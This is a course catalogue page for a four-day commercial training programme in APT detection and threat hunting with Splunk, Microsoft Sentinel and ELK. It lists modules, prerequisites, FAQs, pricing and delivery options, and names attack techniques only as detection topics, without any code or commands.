--- url: "https://xcademia.com/courses/apt-detection-and-advanced-threat-hunting" title: APT Detection and Advanced Threat Hunting description: "4-day hands-on threat hunting training using Splunk, Microsoft Sentinel & ELK. MITRE ATT&CK aligned for SOC L2/L3 analysts and threat hunting professionals." publishedAt: "2026-04-13T06:38:30.039576+00:00" updatedAt: "2026-04-14T09:58:43.406222+00:00" type: course code: "CYB-0158" level: Practitioner duration_days: "4" track: "Cyber Warfare & Advanced Threat Defence" category: "Cybersecurity & Ethical Hacking" credential_tier: tier1 price_gbp: "4495" --- # APT Detection and Advanced Threat Hunting > A four-day hands-on practitioner programme covering hypothesis-driven threat hunting for nation-state intrusions across Splunk, Microsoft Sentinel, and ELK, with daily lab exercises and a live capstone. Build the detection engineering, hunt methodology, and intelligence reporting skills to find APT actors who have already bypassed standard SIEM alerting. ## Overview Nation-state actors average 197 days inside a network before detection. Standard SIEM alerts are designed for known-bad indicators, not patient, living-off-the-land operators who use legitimate tools, trusted processes, and compromised credentials. This four-day programme develops the threat hunting capability needed to find what alerts miss, using the same platforms deployed in enterprise and government SOC environments. Across four days of mentor-led instruction and hands-on platform labs, participants build APT-specific detection rules in Splunk and Microsoft Sentinel, execute structured threat hunts in all three platforms, apply MITRE ATT&CK Navigator to map detection coverage and identify gaps by adversary group, and analyse network traffic and DNS patterns for C2 beaconing and anomaly indicators. Every day concludes with a practical exercise reinforcing the session content. The programme culminates in a four-hour capstone: a live red-versus-blue hunt scenario using a simulated nation-state intrusion dataset. Participants detect, investigate, and produce a professional intelligence report under realistic time pressure. This course is aligned with MITRE ATT&CK, NCSC threat hunting guidance, and platform-specific SOC detection engineering standards. ## Prerequisites - Active experience in a SOC analyst or security operations role at L2 level or above. - Familiarity with at least one SIEM platform and basic query language experience. - Understanding of common attack techniques including phishing, credential theft, and lateral movement. ## What you will learn - Hunt for long-dwell nation-state intrusions using Splunk, Microsoft Sentinel, and ELK across four days of hands-on lab work. - Apply MITRE ATT&CK Navigator to build detection coverage maps and identify gaps by specific adversary group. - Detect living-off-the-land techniques, LOLBin abuse, fileless malware, and trusted process injection patterns. - Identify lateral movement, credential dumping, and C2 beaconing signatures across enterprise telemetry. - Write structured threat hunting hypotheses and execute disciplined, evidence-based hunts to completion. - Produce professional intelligence reports translating hunt findings into actionable SOC and CISO recommendations. - Design and prioritise a detection engineering programme based on threat actor likelihood and sector exposure. ## Skills you will gain - Hypothesis-driven threat hunting methodology - Splunk SPL for detection engineering - Microsoft Sentinel KQL query writing - ELK Stack threat hunting - MITRE ATT&CK Navigator coverage mapping - C2 beaconing and DNS anomaly detection - Living-off-the-land technique detection - Intelligence report production - Lateral movement detection - Hunt library development and documentation - Cloud intrusion detection - Supply chain compromise hunting ## Career progression - Threat Hunter - SOC L2 Analyst - SOC L3 Analyst - Blue Team Lead - Detection Engineer - Incident Responder ## Curriculum 1. **Module 1: Getting Ready** - Pre-reading: MITRE ATT&CK threat hunting methodology overview and hypothesis framework guide - Platform access setup: Splunk trial environment, Sentinel workspace, ELK stack lab configuration - Introduction to the hunt hypothesis framework and hunt log documentation standard used throughout - Course objectives, skill baseline assessment, and individual learning pathway alignment 2. **Module 2: Why Standard SIEM Misses Nation-State Actors** - The 197-day average dwell time: what it means operationally for detection team strategy - Alert-driven versus hypothesis-driven detection: why the strategic shift matters for APT hunting - How nation-state actors operate inside the detection gap using legitimate tools and trusted accounts - Living-off-the-land techniques: why signature-based detection fails against LOLBin abuse - Detection engineering fundamentals: signal-to-noise ratio, alert fatigue, and coverage gaps 3. **Module 3: Living-Off-the-Land and Fileless Malware** - LOLBins catalogue: the legitimate tools most commonly abused by nation-state actors - PowerShell abuse patterns: obfuscation, encoded commands, and remote execution detection - WMI subscriptions and scheduled task persistence: detection signatures and hunt queries - Fileless malware execution: in-memory payloads, registry persistence, and reflective loading - Building behavioural baselines for LOLBin abuse detection in enterprise environments 4. **Module 4: Hunt Hypothesis Development and Planning** - Structured hunt planning: translating threat intelligence into a testable, falsifiable hypothesis - IoC-based versus TTP-based hunting: why TTP-based hunting discovers more persistent intrusions - Writing hunt hypotheses for specific APT group techniques using MITRE ATT&CK as a guide - Building and documenting a hunt library for team reuse and programme continuity - Hunt prioritisation: focusing effort on highest-risk techniques by adversary likelihood 5. **Module 5: Splunk: APT Detection Rule Building** - SPL fundamentals for threat hunting: joins, subsearches, statistical analysis, and lookup tables - Building APT-specific detection rules for APT28, APT29, and Volt Typhoon TTPs in Splunk - Lateral movement detection using authentication event correlation and process telemetry - Credential dumping indicators: LSASS access patterns and Mimikatz behavioural signatures - Scheduled search optimisation and alert tuning to reduce false positives without losing coverage 6. **Module 6: Splunk: Network Traffic and DNS Anomaly Hunting** - C2 beaconing detection: statistical analysis of outbound connection frequency and regularity - Domain generation algorithm identification using entropy analysis and DNS query patterns - Statistical baseline construction for DNS and HTTP traffic using Splunk analytics commands - Hunting for long-dwell implants using periodic communication timing signatures - Lab exercise: hunt for C2 beaconing and DNS anomalies in a simulated enterprise dataset 7. **Module 7: Microsoft Sentinel: KQL and Lateral Movement Detection** - KQL query writing for threat hunting: syntax, joins, time-series analysis, and aggregation - Lateral movement detection: pass-the-hash, pass-the-ticket, Kerberoasting, and Golden Ticket indicators - Credential dumping detection in Microsoft Sentinel log sources: endpoint and identity telemetry - Azure AD and cloud-specific hunting patterns for APT29-style cloud intrusion operations - Lab exercise: hunt for lateral movement indicators in a simulated Sentinel workspace 8. **Module 8: Sentinel: ATT&CK Navigator Coverage Mapping** - Building a detection coverage map using MITRE ATT&CK Navigator from existing Sentinel rules - Mapping analytics rules to specific ATT&CK techniques and identifying coverage gaps by layer - Prioritising new detection rule development by adversary group profile and sector likelihood - Identifying and documenting detection blind spots for CISO reporting and resource justification - Communicating coverage gaps and remediation priorities to SOC leadership and CISO audiences 9. **Module 9: ELK Stack: Threat Hunting Lab** - ELK stack architecture overview for threat hunters: Elasticsearch, Logstash, Kibana roles - Building hunt dashboards in Kibana for continuous monitoring and anomaly visualisation - Writing EQL queries for process event correlation and network anomaly detection - Hunting for supply chain intrusion patterns in software deployment and update logs - ELK lab exercise: hunt using APT-sourced endpoint and network telemetry dataset 10. **Module 10: Supply Chain and Cloud Intrusion Detection** - Detecting SolarWinds-style software supply chain implants in enterprise endpoint and network data - Trusted software abuse: detecting signed binary execution used to deliver malicious payloads - Cloud-specific lateral movement in AWS and Azure: unusual API calls, role assumption, and data access - APT29 Microsoft 365 targeting: detecting cloud intrusion in audit logs and sign-in data - Combined hunt scenario: identify a supply chain compromise from mixed log source dataset 11. **Module 11: Advanced TTP Analysis: Volt Typhoon and APT41** - Volt Typhoon living-off-the-land hunting: LOTL detection in OT-adjacent and industrial environments - APT41 dual-use operations: hunting indicators that distinguish espionage from ransomware pre-positioning - Long-dwell persistence mechanisms: scheduled tasks, WMI subscriptions, and registry run key analysis - Exfiltration detection: identifying slow, low-volume data theft over DNS, HTTPS, and cloud storage - Combined hunt exercise: apply both actor profiles to a live enterprise dataset and document findings 12. **Module 12: Intelligence Report Production** - Translating hunt findings into structured, actionable intelligence products for SOC and CISO audiences - Professional hunt report format: evidence chain, confidence levels, and recommended next actions - Briefing executive stakeholders on APT hunt findings without unnecessary technical complexity - Handoff documentation for incident response teams when a hunt becomes an active investigation - Building and maintaining a documented hunt programme library for continuous SOC improvement 13. **Module 13: Capstone: Live Nation-State Hunt Exercise** - Four-hour live red-versus-blue hunt using a simulated nation-state intrusion dataset across all three platforms - Participants detect, investigate, and attribute the simulated intrusion independently within the time window - Produce a complete professional intelligence report including findings, confidence levels, and recommendations - Full instructor debrief: methodology review, missed indicators, false positive analysis, and improvement plan - Peer review of intelligence reports: structured feedback on analytical quality and reporting standard ## Exam & certification You will receive an Xcademia certificate of completion based on participation and successful completion of labs and scenario simulations. ## Delivery options - **Live Online** — Join live instructor-led sessions from anywhere. Interactive, engaging, and flexible. - **Onsite Training** — We come to you. Training delivered at your workplace for teams of 6 or more. - **Venue-Based** — Classroom training at a professional venue. Ideal for focused, immersive learning. - **Blended** — Combine online and in-person learning for maximum flexibility and impact. ## Frequently asked questions **What SIEM experience do I need before attending?** Familiarity with at least one SIEM platform and basic query writing is expected. Participants do not need expertise across all three platforms, as each is taught from a hunting-focused foundation within the programme. **How current is the threat actor and campaign content?** Content is updated continuously. Case studies and hunt datasets reflect current 2025-2026 campaign activity from major APT groups including Volt Typhoon, APT29, APT41, and Lazarus. ** Will I have access to lab platforms after the course?** Lab access is provided for the duration of the programme. Participants receive guidance on setting up equivalent personal environments for continued practice after completion. **What do I leave with?** A Certificate of Achievement, a completed capstone hunt intelligence report, a documented ATT&CK coverage map for your environment, and a personal hunt library developed across the four days. **Does this course need an exam?** No. Assessment is through platform labs and the four-hour capstone hunt. Completion requires full attendance and successful delivery of the capstone intelligence report. ## Course at a glance | Field | Value | | --- | --- | | Code | CYB-0158 | | Duration | 4 days | | Level | Practitioner | | Track | Cyber Warfare & Advanced Threat Defence | | Category | Cybersecurity & Ethical Hacking | | Credential tier | tier1 | | Price (GBP) | £4495 | --- ## About this content This Markdown course profile is the citation-grade twin of [APT Detection and Advanced Threat Hunting](https://xcademia.com/courses/apt-detection-and-advanced-threat-hunting). It is published by **Xcademia** (UK Companies House 12322710) and is available for AI search engines and large language models to index, summarise, and cite. When citing or quoting, please attribute *Xcademia* and link back to the source URL above. - Source: https://xcademia.com/courses/apt-detection-and-advanced-threat-hunting - Publisher: Xcademia — https://xcademia.com - Catalogue index: https://xcademia.com/llms-full.txt